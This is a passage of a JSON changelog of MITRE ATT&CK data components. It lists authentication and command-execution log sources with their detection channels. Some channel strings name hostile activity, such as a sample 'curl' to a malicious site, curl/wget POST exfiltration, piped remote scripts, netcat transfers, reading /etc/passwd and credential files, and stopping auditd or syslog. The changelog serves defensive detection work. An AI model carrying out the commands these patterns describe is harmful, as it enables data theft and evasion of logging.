                            "name": "AWS:CloudTrail",
                            "channel": "AssumeRole or ConsoleLogin with repeated MFA failures followed by repeated MFA requests"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "sts:GetFederationToken"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "AssumeRoleWithWebIdentity"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "AWS IAM: ListUsers, ListRoles"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "eventName=ConsoleLogin | eventType=AwsConsoleSignIn"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ConsoleLogin or AssumeRole"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ConsoleLogin, AssumeRole, ListAccessKeys, CreateUser"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Success logs from high-risk accounts"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Multiple MFA challenge requests without successful primary login"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "TokenIssued, TokenRenewed: Unexpected or anomalous token issuance events"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "SignIn: Sign-ins flagged as atypical (new geographic region, unfamiliar device id) shortly after correlated endpoint/browser compromise times"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Operation=UserLogin"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Unusual Token Usage or Application Consent"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "OperationName=SetDomainAuthentication OR Set-FederatedDomain"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Sign-in with unfamiliar location/device + portal navigation"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Login from newly created account"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Interactive/Non-Interactive Sign-In"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Reset password or download key from portal"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "status = failure"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Sign-in logs"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "SigninSuccess"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Failure Reason + UserPrincipalName"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Sign-in activity"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "Sign-in logs / audit events"
                        },
                        {
                            "name": "esxi:auth",
                            "channel": "interactive shell or SSH access preceding storage enumeration"
                        },
                        {
                            "name": "esxi:auth",
                            "channel": "/var/log/auth.log"
                        },
                        {
                            "name": "esxi:auth",
                            "channel": "SSH session/login"
                        },
                        {
                            "name": "esxi:vpxa",
                            "channel": "user login from unexpected IP or non-admin user role"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "/var/log/vmware/vpxd.log"
                        },
                        {
                            "name": "ESXiLogs:authlog",
                            "channel": "Unexpected login followed by encoding commands"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "drive.activity"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "login.event"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "Sign-in logs / audit events"
                        },
                        {
                            "name": "gcp:workspaceaudit",
                            "channel": "Token Generation via Domain Delegation"
                        },
                        {
                            "name": "GCPAuditLogs:login.googleapis.com",
                            "channel": "Failed sign-in events"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "get/list requests to /api/v1/secrets or /api/v1/namespaces/*/serviceaccounts"
                        },
                        {
                            "name": "kubernetes:apiserver",
                            "channel": "authentication.k8s.io/v1beta1"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "Failed login"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "authentication.k8s.io"
                        },
                        {
                            "name": "linux:auth",
                            "channel": "sshd login"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sudo/date/timedatectl execution by non-standard users"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "SSH failed login"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Failed password for invalid user"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sshd[pid]: Failed password"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "authentication and authorization events during environmental validation phase"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Logon failure"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "FailedLogin"
                        },
                        {
                            "name": "m365:signinlogs",
                            "channel": "Sign-in from anomalous location or impossible travel condition"
                        },
                        {
                            "name": "m365:signinlogs",
                            "channel": "UserLoginSuccess"
                        },
                        {
                            "name": "m365:signinlogs",
                            "channel": "Unusual sign-in from service principal to user mailbox"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Delegated permission grants without user login event"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "login using refresh_token with no preceding authentication context"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Sign-in logs"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "successful sudo or authentication for account not normally associated with admin actions"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Login success without MFA step"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log show --predicate 'eventMessage contains \"Authentication\"'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "User credential prompt events without associated trusted installer package"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Login failure / authorization denied"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "auth"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Login Window and Authd errors"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "authd"
                        },
                        {
                            "name": "network:auth",
                            "channel": "repeated successful authentications with previously unknown accounts or anomalous password acceptance"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "config access, authentication logs"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "User privilege escalation to level 15/root prior to destructive commands"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "authorization/accounting logs"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Failed and successful logins to network devices outside approved admin IP ranges"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Privileged login followed by destructive format command"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "admin login events"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "Privileged login followed by destructive command sequence"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "AAA, RADIUS, or TACACS authentication"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "authentication logs"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "AAA or TACACS authentication failures"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "authentication & authorization"
                        },
                        {
                            "name": "networkdevice:syslog",
                            "channel": "login failed"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Accepted password or publickey for user from remote IP"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Repeated failed authentication attempts or replay patterns"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Successful login without expected MFA challenge"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "sshd or PAM logins"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TGS-REQ and AS-REQ seen for new user shortly after domain-modifying process"
                        },
                        {
                            "name": "Okta:authn",
                            "channel": "authentication_failure"
                        },
                        {
                            "name": "Okta:SystemLog",
                            "channel": "eventType: user.authentication.sso, app.oauth2.token.grant"
                        },
                        {
                            "name": "saas-app:auth",
                            "channel": "login_failure"
                        },
                        {
                            "name": "saas:audit",
                            "channel": "Repeated requests to SMS-generating endpoints using anomalous or new user agents, IP ranges, or geographies."
                        },
                        {
                            "name": "saas:auth",
                            "channel": "signin_failed"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "API access without user login"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "Accessed third-party credential management service"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "login with reused session token and mismatched user agent or IP"
                        },
                        {
                            "name": "saas:googleworkspace",
                            "channel": "Access via OAuth credentials with unusual scopes or from anomalous IPs"
                        },
                        {
                            "name": "saas:MDM",
                            "channel": "Authentication events to device management or enterprise mobility management consoles"
                        },
                        {
                            "name": "saas:MDM",
                            "channel": "Authentication events to Apple iCloud or enterprise device management services"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "session.impersonation.start"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "Unusual OAuth app requesting message-read scopes for Slack/Teams/Jira"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "authentication_failure"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "Sign-in logs / audit events"
                        },
                        {
                            "name": "saas:okta",
                            "channel": "user.account.reset_password; user.mfa.factor.activate; app.oauth2.authorize"
                        },
                        {
                            "name": "saas:salesforce",
                            "channel": "API login using access_token without login history"
                        },
                        {
                            "name": "saas:salesforce",
                            "channel": "Login"
                        },
                        {
                            "name": "User Account",
                            "channel": "None"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4625"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4769, 1200, 1202"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4768, 4769, 4770"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4769"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4776, 4625"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4625, 4771, 4648"
                        },
                        {
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4648"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "3.0",
                    "x_mitre_domains": [
                        "ics-attack",
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 19:47:33.610000+00:00\", \"old_value\": \"2025-11-12 22:03:39.105000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][92]\": {\"name\": \"saas:MDM\", \"channel\": \"Authentication events to device management or enterprise mobility management consoles\"}, \"root['x_mitre_log_sources'][93]\": {\"name\": \"saas:MDM\", \"channel\": \"Authentication events to Apple iCloud or enterprise device management services\"}, \"root['x_mitre_log_sources'][98]\": {\"name\": \"saas:okta\", \"channel\": \"user.account.reset_password; user.mfa.factor.activate; app.oauth2.authorize\"}, \"root['x_mitre_domains'][2]\": \"mobile-attack\"}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 3.0"
                }
            ],
            "minor_version_changes": [
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-24 19:47:16.123000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0064",
                            "external_id": "DC0064"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Command Execution",
                    "description": "Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as `cmd.exe`, `bash`, `zsh`, `PowerShell`, or programmatic execution. Examples: \n\n- Windows Command Prompt\n    - dir \u2013 Lists directory contents.\n    - net user \u2013 Queries or manipulates user accounts.\n    - tasklist \u2013 Lists running processes.\n- PowerShell\n    - Get-Process \u2013 Retrieves processes running on a system.\n    - Set-ExecutionPolicy \u2013 Changes PowerShell script execution policies.\n    - Invoke-WebRequest \u2013 Downloads remote resources.\n- Linux Shell\n    - ls \u2013 Lists files in a directory.\n    - cat /etc/passwd \u2013 Reads the user accounts file.\n    - curl http://malicious-site.com \u2013 Retrieves content from a malicious URL.\n- Container Environments\n    - docker exec \u2013 Executes a command inside a running container.\n    - kubectl exec \u2013 Runs commands in Kubernetes pods.\n- macOS Terminal\n    - open \u2013 Opens files or URLs.\n    - dscl . -list /Users \u2013 Lists all users on the system.\n    - osascript -e \u2013 Executes AppleScript commands.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "android:logcat",
                            "channel": "Command 'pm list packages' executed by app sandbox or child proc"
                        },
                        {
                            "name": "auditd:CONFIG_CHANGE",
                            "channel": "udev rule reload or trigger command executed"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve of script/interpreter (bash, python, node) with suspicious encoded or non-printable content"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Use of mv or cp to rename files with '.' prefix"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve: Execution of update-ca-certificates or trust anchor modification commands"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "gcore, gdb, strings, hexdump execution"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of auditctl, systemctl stop auditd, or kill -9 auditd"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execution of systemctl with subcommands start, stop, enable, disable"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of GUI-related binaries with suppressed window/display flags"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "curl -X POST, wget --post-data"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "command line arguments containing lsblk, fdisk, parted"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "exec: Execution of dd, efibootmgr, or flashrom modifying firmware/boot partitions"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "curl -d, wget --post-data"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "grep/cat/awk on files with password fields"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "git push, curl -X POST"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of gsettings set org.gnome.login-screen disable-user-list true"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execution of setfattr or getfattr commands"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Process execution of update-ca-certificates or openssl with suspicious arguments"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of chattr to set +i or +a attributes"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "curl or wget with POST/PUT options"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "curl -T, rclone copy"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve of curl,wget,bash,sh,python with piped or remote content"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve, kill, ptrace, insmod, rmmod targeting security processes"
                        },
                        {
                            "name": "auditd:PROCTITLE",
                            "channel": "proctitle contains chmod, chown, setfacl, or attr commands with suspicious parameters"
                        },
                        {
                            "name": "auditd:PROCTITLE",
                            "channel": "proctitle contains chmod, chown, chgrp, setfacl, or attr with suspicious parameters (777, 755, +x, -R)"
                        },
                        {
                            "name": "auditd:PROCTITLE",
                            "channel": "process title records containing discovery command sequences and environmental assessment patterns"
                        },
                        {
                            "name": "auditd:PROCTITLE",
                            "channel": "command-line execution patterns for system discovery utilities (uname, hostname, ifconfig, netstat, lsof, ps, mount)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of realmd, samba-tool, or ldapmodify with user-related arguments"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of script interpreters by systemd timer (ExecStart)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Commands like systemctl stop <service>, service <service> stop, or kill -9 <pid>"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls to locale, timedatectl, or cat /etc/timezone"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "sleep function usage or loops (nanosleep, usleep) in scripts"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "connect, execve, write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve call including 'nohup' or trailing '&'"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Commands executed within an SSH session where no matching logon/authentication event exists"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod, execve"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: iptables, nft, firewall-cmd modifications"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Invocation of scp, rsync, curl, or sftp"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls modifying local mail filter configuration files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: process_name IN (\"virsh\", \"VBoxManage\", \"qemu-img\") AND command IN (\"list\", \"info\")"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: service stop syslog, systemctl stop rsyslog, kill -9 syslog"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: openssl pkcs12, certutil, keytool"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Process in container namespace executes curl|wget|bash|sh|python|nc with outbound args"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of systemctl or service with enable/start parameters"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of cat, less, grep, journalctl targeting log directories (/var/log/)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of python, perl, or custom binaries invoking compression libraries"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, USER_CMD"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "bash/zsh of base64, tar, gzip, or openssl immediately after file write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Processes executing sendmail/postfix with forged headers"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of tar, gzip, bzip2, xz, zip, or openssl with compression/encryption arguments"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "promiscuous mode transitions (ioctl or ifconfig)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chattr, rm, shred, dd run on recovery directories or partitions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of curl or wget writing files to /tmp/* followed by chmod or execution"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of downgraded interpreters such as python2 or forced fallback commands"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Command line arguments including SPApplicationsDataType"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of spoofing tools (e.g., hping3, nping, scapy) sending UDP packets to known amplifier ports"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of tools like cat, grep, or awk on credential files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of curl, rsync, wget with internal knowledge base or IPs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of systemctl, loginctl, or systemd-inhibit commands related to sleep/hibernate"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of xev, xdotool, or input activity emulators"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of interpreters creating archive-like outputs without calling tar/gzip"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of insmod, modprobe, or rmmod commands by non-standard users or outside expected timeframes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve syscalls for discovery commands (uname, hostname, id, whoami, ps, netstat, mount) with command-line parameter analysis"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of curl, wget, or custom scripts accessing financial endpoints"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of tar, gzip, bzip2, or openssl with output redirection"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve=/sbin/shutdown or /sbin/reboot"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls modifying HISTFILE or HISTCONTROL via unset/export"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls to /usr/bin/locale or shell execution of $LANG"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of systemctl or service with enable/start/modify"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of lsmod, modinfo, or cat /proc/modules"
                        },
                        {
                            "name": "auditd:USER_CMD",
                            "channel": "USER_CMD"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "InvokeFunction"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "eventName: RunInstances, CreateUser, PutRolePolicy, InvokeCommand"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "SSM RunCommand"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "GetLogEvents: High frequency log exports from CloudWatch or equivalent services"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "command-line execution invoking credential enumeration"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ssm:GetCommandInvocation"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "SendCommand, StartSession, ExecuteCommand: Unexpected AWS Systems Manager command execution targeting EC2 instances"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "Intune PowerShell Scripts"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "OperationName=SetDomainAuthentication OR Update-MsolFederatedDomain"
                        },
                        {
                            "name": "Command",
                            "channel": "None"
                        },
                        {
                            "name": "docker:api",
                            "channel": "docker logs access or container inspect commands from non-administrative users"
                        },
                        {
                            "name": "docker:daemon",
                            "channel": "docker exec or docker run with unexpected command/entrypoint"
                        },
                        {
                            "name": "docker:events",
                            "channel": "container exec rm|container stop --force"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "useradd or /etc/passwd modified inside container"
                        },
                        {
                            "name": "EDR:AMSI",
                            "channel": "None"
                        },
                        {
                            "name": "EDR:cli",
                            "channel": "Command Line Telemetry"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "command execution"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "/var/log/hostd.log"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "modification of config files or shell command execution"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "shell access or job registration"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "logline inspection"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "esxcli network firewall set commands"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "event stream"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "scp/ssh used to move file across hosts"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "None"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "esxcli system syslog config set or reload"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "command log"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Execution of '/bin/vmx' or modifications to '/etc/rc.local.d/local.sh'"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Command Execution"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "remote CLI + vim-cmd logging"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "execution + payload hints"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "esxcli system syslog config set/reload, services.sh restart/stop"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "snapshot create/copy, esxcli"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "interactive shell"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/shell.log"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "invoked remote scripts (esxcli)"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "base64 or gzip use within shell session"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "scripts or binaries with misleading names"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/shell.log entries containing \"esxcli system clock get\""
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "None"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "command IN (\"esxcli vm process list\", \"vim-cmd vmsvc/getallvms\")"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "openssl|tar|dd"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "Execution of cat, tail, grep targeting /var/log/vmkernel.log or /var/log/hostd.log"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "CLI usage logs"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "Command execution trace"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "shell command execution for chmod, chown, or file permission modification on VMFS or system files"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "esxcli system syslog config set --loghost='' or stopping hostd service"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "Shell Access/Command Execution"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "esxcli software vib list"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/root/.ash_history"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "mv, rename, or chmod commands moving VM files into hidden directories"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "`esxcli software vib install` with `--force` or `--no-sig-check` from shell history or `shell.log`"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "CLI session activity"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "esxcli system shutdown or reboot invoked"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "shell command execution for system discovery (vim-cmd, esxcli, vmware-cmd) targeting VM inventory and host configuration"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "unset HISTFILE or HISTFILESIZE modifications"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "boot logs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "/var/log/vmkernel.log"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "DCUI shell start, BusyBox activity"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "esxcli system account add"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Unexpected restarts of management agents or shell access"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "esxcli, vim-cmd invocation"
                        },
                        {
                            "name": "esxi:vobd",
                            "channel": "shell session start"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "vCenter Management"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file system activity monitor"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "access to BPF devices or interface IOCTLs"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "None"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "methodName: setIamPolicy, startInstance, createServiceAccount"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "Shell process (e.g., /bin/sh, /bin/bash) spawned in a container without an interactive session attached (i.e., automation anomaly)"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "process execution involving curl, grep, or awk on secrets"
                        },
                        {
                            "name": "linus:syslog",
                            "channel": "None"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "command logging"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "Shell history logs"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "Terminal Command History"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "/home/*/.bash_history"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Command-line includes base64 -d or openssl enc -d"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process_events.command_line"
                        },
                        {
                            "name": "linux:shell",
                            "channel": "Manual invocation of software enumeration commands via interactive shell"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "cron activity"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Suspicious script or command execution targeting browser folders"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Unusual outbound transfers from CLI tools like base64, gzip, or netcat"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sudo chage|grep pam_pwquality|cat /etc/login.defs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sudo execution of ffmpeg/gst-launch/v4l2-ctl by non-standard user"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sshd logs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "CLI access to 'show running-config', 'show password', or 'cat config.txt'"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Sudo or root escalation followed by filesystem mount commands"
                        },
                        {
                            "name": "linuxsyslog",
                            "channel": "nslcd or winbind logs"
                        },
                        {
                            "name": "m365:defender",
                            "channel": "Activity Log: Command Invocation"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Cmdlet: Get-GlobalAddressList, Get-Recipient"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Get-RoleGroup, Get-DistributionGroup"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "Inbound email triggers execution of mailbox-stored custom form"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "Inbound email matches crafted rule trigger pattern tied to persistence logic"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "Inbound email triggering Outlook to auto-access folder tied to malicious Home Page"
                        },
                        {
                            "name": "m365:office",
                            "channel": "Startup execution includes non-default component"
                        },
                        {
